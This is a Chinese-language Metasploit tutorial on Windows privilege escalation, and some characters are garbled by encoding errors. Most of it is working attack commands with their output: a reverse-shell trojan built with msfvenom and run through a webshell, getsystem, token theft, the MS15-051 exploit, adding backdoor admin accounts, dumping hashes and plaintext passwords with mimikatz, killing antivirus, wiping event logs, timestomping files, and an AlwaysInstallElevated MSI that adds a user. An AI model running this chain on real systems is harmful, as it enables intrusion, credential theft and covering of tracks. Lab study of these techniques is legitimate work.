前言

提權(quán)何須收集各種EXP，一個(gè)MSF就夠了，本文為大家?guī)?lái)MSF綜合提權(quán)的一些姿勢(shì)。

文章內(nèi)容：

學(xué)習(xí)`Meterpreter`自動(dòng)提權(quán)

學(xué)習(xí)溢出漏洞模塊提權(quán)

學(xué)習(xí)后續(xù)提權(quán)操作

學(xué)習(xí)`AlwaysInstallElevated`提權(quán)

part1 Meterpreter自動(dòng)提權(quán)

本部分主要學(xué)習(xí)在獲得目標(biāo)機(jī)器的一定權(quán)限后，如何使用`Metasploit`獲得的`Meterpreter`會(huì)話進(jìn)行基本的提權(quán)操作。

步驟1 生成后門程序

攻擊荷載的生成我們需要用到`msfVENOM`:

`metasploit-framework`旗下的`msfpayload`（荷載生成器），`msfencoder`（編碼器），`msfcli`（監(jiān)聽接口）已然成為歷史，取而代之的是**`msfvenom`**.

我們?cè)趉ali的命令行下直接執(zhí)行以下命令獲得一個(gè)針對(duì)windows的反彈型木馬：

msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe

這里我們?yōu)樯傻哪抉R指定了`payload`為`windows/meterpreter/reverse_tcp`,反彈到的監(jiān)聽端地址為`172.16.11.2`，監(jiān)聽端口為`4444`，文件輸出格式為`exe`并保存到路徑`/tmp/hack.exe`

如下返回信息：

No platform was selected, choosing Msf::Module:latform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

Saved as: /tmp/hack.exe

>返回信息主要說(shuō)明：本次生成的攻擊荷載(木馬程序)針對(duì)于windows的32位類型系統(tǒng)，文件大小333字節(jié)（可見攻擊荷載何其短小精悍），還說(shuō)明了文件保存路徑。

步驟2 執(zhí)行監(jiān)聽

在Metasploit使用`use`命令載入監(jiān)聽模塊`exploit/multi/handler`:

use exploit/multi/handler

接著使用如下命令設(shè)置payload為`windows/meterpreter/reverse_tcp`：

set payload windows/meterpreter/reverse_tcp

我們需要設(shè)置本地監(jiān)聽主機(jī)為本機(jī)ip`172.16.11.2`:

set LHOST 172.16.11.2

然后我們使用以下命令查看相關(guān)參數(shù)是否設(shè)置完畢：

show options

我們得到了以下主要信息，可知，監(jiān)聽端的主機(jī)和監(jiān)聽端口都已設(shè)置完畢：

Module options (exploit/multi/handler):

Payload options (windows/meterpreter/reverse_tcp):

LHOST? ???172.16.11.2? ? The listen address

LPORT? ???4444? ?? ?? ???The listen port

輸入exploit命令開啟我們配置的模塊進(jìn)行監(jiān)聽：

步驟3 上傳并執(zhí)行木馬

通過(guò)腳本木馬上傳并運(yùn)行，此處假設(shè)我們通過(guò)一系列的滲透測(cè)試得到了目標(biāo)機(jī)器的webshell。

我們通過(guò)腳本木馬的文件管理功能把我們上述生成的木馬`hack.exe`上傳成功，并且我們得知，該程序的絕對(duì)路徑為：

c:\www\hack.exe

接著，我們嘗試通過(guò)腳本木馬的命令執(zhí)行功能運(yùn)行我們上述上傳的的木馬，

c:/www/hack.exe//為避免字符轉(zhuǎn)義，路徑這里我們使用的是'/'

那么在執(zhí)行之后，我們看到大型腳本木馬顯示為請(qǐng)稍后的狀態(tài)，我們切換到之前監(jiān)聽的Metasploit命令行窗口，可以看到，目標(biāo)機(jī)正在回連，且Meterpreter會(huì)話創(chuàng)建成功：

如上，我們已經(jīng)取得了目標(biāo)機(jī)的Meterpreter會(huì)話。

步驟4 Meterpreter基礎(chǔ)提權(quán)

>`Meterpreter` 是 Metasploit 框架中的一個(gè)殺手锏,通常作為漏洞溢出后的攻擊在和使用, 攻擊在和在出發(fā)漏洞后能夠返回給我們一個(gè)控制通道.

接下來(lái)我們使用`Meterpreter`會(huì)話進(jìn)行自動(dòng)化提權(quán)操作，直接執(zhí)行以下命令，MSF會(huì)自動(dòng)選擇合適的方式來(lái)提升當(dāng)前權(quán)限：

getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

如上返回則說(shuō)明`Meterpreter`會(huì)話自動(dòng)提權(quán)成功。

這個(gè)時(shí)候，如果我們此目標(biāo)機(jī)屬于某個(gè)域環(huán)境內(nèi)，并且有域管理員運(yùn)行的程勛，我們就可以從一個(gè)給定的進(jìn)程PID中竊取一個(gè)域管理員組令牌，做一些有意思的事（如：添加一個(gè)域賬戶，并把域賬戶添加到域管理員組中）。

在`Meterpreter`會(huì)話執(zhí)行ps命令查看目標(biāo)機(jī)當(dāng)前進(jìn)程：

假設(shè)此處看到了一個(gè)進(jìn)程，運(yùn)行賬戶是域管理員，我們可以再第一欄找到對(duì)應(yīng)的進(jìn)程PID，（實(shí)際我們這里找個(gè)任意的SYSTEM賬戶運(yùn)行的進(jìn)程），PID為2584：

然后我們可以執(zhí)行以下語(yǔ)句竊取該用戶進(jìn)程的令牌：

steal_token 2584

這種方式一般被用于盜取域管理員的token，然后我們執(zhí)行：`getuid`看一下會(huì)發(fā)現(xiàn)當(dāng)前已經(jīng)冒稱`SYSTEM`用戶成功：

既然已經(jīng)是`SYSTEM`權(quán)限，接著我們嘗試執(zhí)行以下命令從SAM數(shù)據(jù)庫(kù)中導(dǎo)出密碼的哈希值：

`注意`：在windows 2008 中，如果`getsystem`命令和`hashdump`命令拋出異常情況時(shí)，你需要遷移到一個(gè)以`SYSTEM`系統(tǒng)權(quán)限運(yùn)行的進(jìn)程中,我們后續(xù)介紹。

執(zhí)行以下shell命令在一個(gè)`Meterpreter`會(huì)話界面中使用`cmd shell`：

此`cmdshell`當(dāng)然是繼承的`Meterpreter`會(huì)話的`system`權(quán)限，我們嘗試在目標(biāo)機(jī)器執(zhí)行以下cmd命令添加一個(gè)賬戶`test`：

net user test v5est0r /add

net localgroup administrators test /add

隨后我們利用`Meterpreter`會(huì)話打開目標(biāo)機(jī)器遠(yuǎn)程桌面服務(wù)的3398端口(此模塊根據(jù)實(shí)踐測(cè)試僅支持windows 2003的主機(jī))：

run getgui -e

Windows Remote Desktop Configuration Meterpreter Script by DarkoperatorCarlos Perezcarlos_perez@darkoperator.comEnabling Remote DesktopRDP is already enabledSetting Terminal Services service startup modeTerminal Services service is already set to autoOpening port in local firewall if necessaryFor cleanup use command: run multi_console_command -rc

返回如上信息說(shuō)明遠(yuǎn)程終端服務(wù)開啟成功。

最后我們新建一個(gè)終端窗口，執(zhí)行以下命令調(diào)用`rdesktop`連接目標(biāo)機(jī)器的遠(yuǎn)程桌面：

rdesktop -u test -p v5est0r 172.16.12.2

`-u`:制定用戶名 `-p`：指定密碼

如上圖，我們成功登入目標(biāo)機(jī)的遠(yuǎn)程桌面。

part2 溢出漏洞模塊提權(quán)

一般來(lái)說(shuō)webshell對(duì)應(yīng)的web服務(wù)的權(quán)限是很低的，一般都是`user`權(quán)限的，但也遇到過(guò)某些服務(wù)器執(zhí)行后就直接是`system`最高權(quán)限。像這種情況一般直接加用戶。

如果權(quán)限較低，我們要把它提升到`system`權(quán) - Windows最高權(quán)限，黑客一般通過(guò)提權(quán)的EXP程序進(jìn)行提權(quán)，我們會(huì)在后續(xù)的實(shí)驗(yàn)里介紹。

當(dāng)然，在MSF下調(diào)用溢出漏洞模塊提權(quán)也是個(gè)好辦法。

`緩沖區(qū)溢出`：

緩沖區(qū)是用戶為程序運(yùn)行時(shí)在計(jì)算機(jī)中申請(qǐng)的一段連續(xù)的內(nèi)存，它保存了給定類型的數(shù)據(jù)。緩沖區(qū)溢出指的是一種常見且危害很大的系統(tǒng)攻擊手段，通過(guò)向程序的緩沖區(qū)寫入超出其長(zhǎng)度的內(nèi)容，造成緩沖區(qū)的溢出，從而破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其他的指令，以達(dá)到攻擊的目的。更為嚴(yán)重的是，緩沖區(qū)溢出攻擊占了遠(yuǎn)程網(wǎng)絡(luò)攻擊的絕大多數(shù)，這種攻擊可以使得一個(gè)匿名的Internet用戶有機(jī)會(huì)獲得一臺(tái)主機(jī)的部分或全部的控制權(quán)！由于這類攻擊使任何人都有可能取得主機(jī)的控制權(quán)，所以它代表了一類極其嚴(yán)重的安全威脅。

步驟1 調(diào)用漏洞模塊

首先，請(qǐng)參照上述`Meterpreter自動(dòng)提權(quán)`部分的實(shí)驗(yàn)內(nèi)容獲得目標(biāo)機(jī)器的一個(gè)可用的`Meterpreter`會(huì)話，接著我們?cè)赻Meterpreter`會(huì)話輸入以下命令：

background

//把你當(dāng)前的Meterpreter會(huì)話轉(zhuǎn)為后臺(tái)執(zhí)行。

接著我們?cè)贛SF命令行執(zhí)行以下命令搜索微軟2015年的可用漏洞模塊：

search ms15

// 搜索關(guān)鍵字相關(guān)的漏洞

如下圖，我們查到了許多漏洞模塊：

我選擇了`MS15_051`這個(gè)漏洞進(jìn)行提權(quán)，執(zhí)行以下命令：

use exploit/windows/local/ms15_051_client_copy_image

然后我們需要為此活動(dòng)模塊指定為哪個(gè)`session`進(jìn)行提權(quán)操作，我們執(zhí)行以下命令指定服務(wù)`session`為`1`：

set??SESSION 1

// 設(shè)置會(huì)剛才我們后門連接的ID號(hào) 1，我們這里只有一個(gè)會(huì)話，直接連接1

漏洞模塊利用只需要指定`session`無(wú)需其他參數(shù)。

步驟2 執(zhí)行溢出

接著我們直接執(zhí)行以下命令調(diào)用漏洞模塊進(jìn)行提權(quán)操作：

exploit

//執(zhí)行提權(quán)...

根據(jù)返回信息我們可以看見沒有創(chuàng)建新的`session`，并提醒當(dāng)前已經(jīng)被提升到了`system`權(quán)限。如果當(dāng)前不是`system`權(quán)限，將會(huì)被提升到`system`的一個(gè)進(jìn)程，并提供出進(jìn)程pid.

一般來(lái)說(shuō)，即使提權(quán)成功，我們執(zhí)行以下命令返回連接會(huì)話，但你`getuid`看下還是看見的還是原來(lái)的權(quán)限。

sessions -i 1

執(zhí)行`ps`一下查看進(jìn)程

根據(jù)剛才的提示找到上述提供的PID的進(jìn)程，我們這里就隨意找了一個(gè)`SYSTEM`權(quán)限進(jìn)行的進(jìn)程，PID為`3240`

然后我們要用到`migrate`命令，將當(dāng)前會(huì)話進(jìn)程遷移到一個(gè)指定的進(jìn)程ID。

migrate 3240

如上圖可見，進(jìn)程遷移成功。

然后我們?cè)賵?zhí)行`getuid`看下可以看見當(dāng)前為system權(quán)限了。

如上，我們已經(jīng)模擬提升到了windows最高權(quán)限。

part3 后續(xù)提權(quán)操作

本部分主要介紹`Meterpreter`會(huì)話的豐富的提權(quán)模塊支持的使用。

步驟1 基本信息搜集

檢測(cè)目標(biāo)機(jī)是否為虛擬機(jī)。

在`Meterpreter`會(huì)話執(zhí)行以下命令即可：

run post/windows/gather/checkvm #是否虛擬機(jī)

此處判斷并不準(zhǔn)確，模塊代碼仍需完善。

通過(guò)meterpreter的killav腳本來(lái)殺死目標(biāo)主機(jī)運(yùn)行的殺毒軟件：

在`Meterpreter`會(huì)話執(zhí)行以下命令即可：

run killav

看來(lái)此模塊仍需完善，此處殺掉的進(jìn)程是cmd。不過(guò)有時(shí)候還是有用的。

獲取安裝軟件信息，在`Meterpreter`會(huì)話執(zhí)行以下命令即可：

run post/windows/gather/enum_applications #獲取安裝軟件信息

獲取目標(biāo)機(jī)器最近的文件操作，在`Meterpreter`會(huì)話執(zhí)行以下命令即可：

run post/windows/gather/dumplinks? ?#獲取最近的文件操作

步驟2 hash與明文密碼讀取

獲取目標(biāo)機(jī)系統(tǒng)用戶Hash，，在`Meterpreter`會(huì)話執(zhí)行以下命令即可：

run post/windows/gather/smart_hashdump

Running module against TESTINGHashes will be saved to the database if one is connected.Hashes will be saved in loot in JtR password file format to:/home/croxy/.msf4/loot/20150929225044_default_10.0.2.15_windows.hashes_407551.txtDumping password hashes...Running as SYSTEM extracting hashes from registryObtaining the boot key...Calculating the hboot key using SYSKEY 8c2c8d96e92a8ccfc407a1ca48531239...Obtaining the user list and keys...Decrypting user keys...Dumping password hints...

[+]? ???Croxy:"Whoareyou"Dumping password hashes...

[+]? ???Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[+]? ???HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:e3f0347f8b369cac49e62a18e34834c0:::

[+]? ???test:1003:aad3b435b51404eeaad3b435b51404ee:0687211d2894295829686a18ae83c56d:::

如上我們獲得了本地賬戶的hask。

獲取明文密碼，我們需要先載入`mimikatz`模塊，，在`Meterpreter`會(huì)話執(zhí)行以下命令即可：

load mimikatz

然后需要確保當(dāng)前進(jìn)程為系統(tǒng)權(quán)限：直接執(zhí)行以下命令：

msv

如上圖，返回了以下信息：

[+] Running as SYSTEMRetrieving msv credentials

上述返回信息表明當(dāng)前進(jìn)程是`SYSTEM`權(quán)限.

然后執(zhí)行以下命令即可導(dǎo)出系統(tǒng)用戶明文密碼：

kerberos

如下圖，成功導(dǎo)出了明文密碼，`test`用戶密文為`v5est0r`：

執(zhí)行以下命令通過(guò)`mimikatz`命令行方式導(dǎo)出系統(tǒng)用戶hash：

meterpreter > mimikatz_command -f samdump::hashes

執(zhí)行以下命令通過(guò)`mimikatz`命令行方式導(dǎo)出系統(tǒng)用戶的明文密碼：

mimikatz_command -f sekurlsa::searchPasswords

步驟3 清理痕跡

直接執(zhí)行以下命令：

clearev

可以看到如下返回：

meterpreter > clearevWiping 2654 records from Application...

Wiping 137 records from System...

Wiping 212 records from Security...

可以看到該模塊正在從應(yīng)用、系統(tǒng)、安全模塊三個(gè)方面清理歷史記錄痕跡。

其實(shí)MSF還提供了`timestomp`功能模塊還修改文件時(shí)間，但實(shí)戰(zhàn)測(cè)試中意義并不大，我們?cè)谶@里只做科普：

meterpreter >timestomp c:\\www -c "09/09/1980 12:12:34"? ?修改文件創(chuàng)建時(shí)間

meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34"??修改文件修改時(shí)間

meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 講文件RHDSetup.log屬性復(fù)制到j(luò)zking121

實(shí)際測(cè)試使用偶爾有報(bào)錯(cuò)，可以登入服務(wù)器手工改文件時(shí)間。

part 4 `AlwaysInstallElevated`提權(quán)

`AlwaysInstallElevated`是微軟允許非授權(quán)用戶以`SYSTEM`權(quán)限運(yùn)行安裝文件(`MSI`)的一種設(shè)置。

步驟1 生成MSI安裝文件假設(shè)我們拿到`Meterpreter`會(huì)話后并沒能通過(guò)一些常規(guī)方式取得`SYSTEM`權(quán)限，`AlwaysInstallElevated`提權(quán)可能會(huì)為我們帶來(lái)一點(diǎn)希望。

`AlwaysInstallElevated`是微軟允許非授權(quán)用戶以`SYSTEM`權(quán)限運(yùn)行安裝文件(`MSI`)的一種設(shè)置。然而，給予用于這種權(quán)利會(huì)存在一定的安全隱患，因?yàn)槿绻@樣做下面兩個(gè)注冊(cè)表的值會(huì)被置為"`1`"：

[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer]

"AlwaysInstallElevated"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

"AlwaysInstallElevated"=dword:00000001

想查詢這兩個(gè)鍵值最簡(jiǎn)單的方法就是使用CMD命令,我們先在`Meterpreter`會(huì)話下執(zhí)行`shell`切換到`cmdshell`：

在`cmdshell`下分別執(zhí)行以下命令可以查詢上述的注冊(cè)表鍵值：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

我們這里的查詢是報(bào)錯(cuò)的。

`注意`：如果這條命令出錯(cuò)類似于：The system was unable to find the specified registry key or value或者：

錯(cuò)誤: 系統(tǒng)找不到指定的注冊(cè)表項(xiàng)或值。

這可能是組策略里`AlwaysInstallElevated`沒有被定義，因此不存在相關(guān)聯(lián)的注冊(cè)表項(xiàng)。

現(xiàn)在我們假設(shè)`AlwaysInstallElevated`已經(jīng)啟用了，我們可以利用`msfvenom`工具來(lái)生成一個(gè)在目標(biāo)機(jī)器上增加管理員用戶的`MSI`安裝文件：

msfvenom -p windows/adduser USER=msi PASS=P@ssword123! -f msi -o /tmp/add.msi

//此處指定了添加的用戶，用戶名為msi，密碼為：P@ssword123!

如上圖返回，MSI文件已經(jīng)成功生成到了`/tmp/add.msi`.

步驟2 執(zhí)行MSI文件提權(quán)

接著我們把該安裝文件上傳到目標(biāo)機(jī)的`c:\\add.msi`:

執(zhí)行以下命令即可：

upload /tmp/add.msi c:\\add.msi

當(dāng)我們?cè)谀繕?biāo)機(jī)器上成功上傳了新生成的MSI文件后，我們可以使用Windows命令行`Msiexec`工具進(jìn)行安裝（需要先執(zhí)行`shell`命令切換到`cmdshell`）：

shell

msiexec /quiet /qn /i c:\add.msi

`msiexec`相關(guān)參數(shù)解釋如下：

`/quiet`:安裝過(guò)程中禁止向用戶發(fā)送消息

`/qn`:不使用GUI

`/i`:安裝程序

執(zhí)行后，我們可以在目標(biāo)機(jī)器上檢測(cè)我們新創(chuàng)建的管理員用戶

`cmdshell`下執(zhí)行以下命令查看管理組用戶列表：

net localgroup administrators

如上，我們很幸運(yùn)的發(fā)現(xiàn)，`msi`用戶名存在于管理組列表，Good job！

`注意`:使用`msvenom`創(chuàng)建MSI文件時(shí)使用了`always_install_elevated`模塊，那么在安裝過(guò)程中會(huì)失敗。這是因?yàn)椴僮飨到y(tǒng)會(huì)阻止未注冊(cè)的安裝。

接著執(zhí)行以下命令登錄目標(biāo)機(jī)器的遠(yuǎn)程桌面服務(wù)：

rdesktop -u msi -p P@ssword123! 172.16.12.2

如果目標(biāo)機(jī)沒有開啟遠(yuǎn)程桌面服務(wù)，可以再`cmdshell`下執(zhí)行以下命令以開啟：

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

思考與總結(jié)：

通過(guò)本文我們學(xué)習(xí)了借助Mtasploit的`Meterpreter`會(huì)話進(jìn)行基本的自動(dòng)化提權(quán)操作。此部分作為基礎(chǔ)節(jié)點(diǎn)，還詳細(xì)介紹了`Meterpreter`會(huì)話的獲得、模塊參數(shù)設(shè)置等基本操作。

我們還學(xué)習(xí)了利用`Meterpreter`會(huì)話，調(diào)用溢出漏洞模塊對(duì)特定的會(huì)話進(jìn)行溢出漏洞提權(quán)的的提權(quán)方式、進(jìn)行提權(quán)前期的信息搜集和提權(quán)完畢后的信息采集和痕跡清理等基本操作、利用微軟的`AlwaysInstallElevated`設(shè)置不當(dāng)問(wèn)題，生成惡意MSI文件進(jìn)行提權(quán)的提權(quán)方式。

提權(quán)屬于敏感操作，請(qǐng)?jiān)诜稍试S的范圍內(nèi)測(cè)試！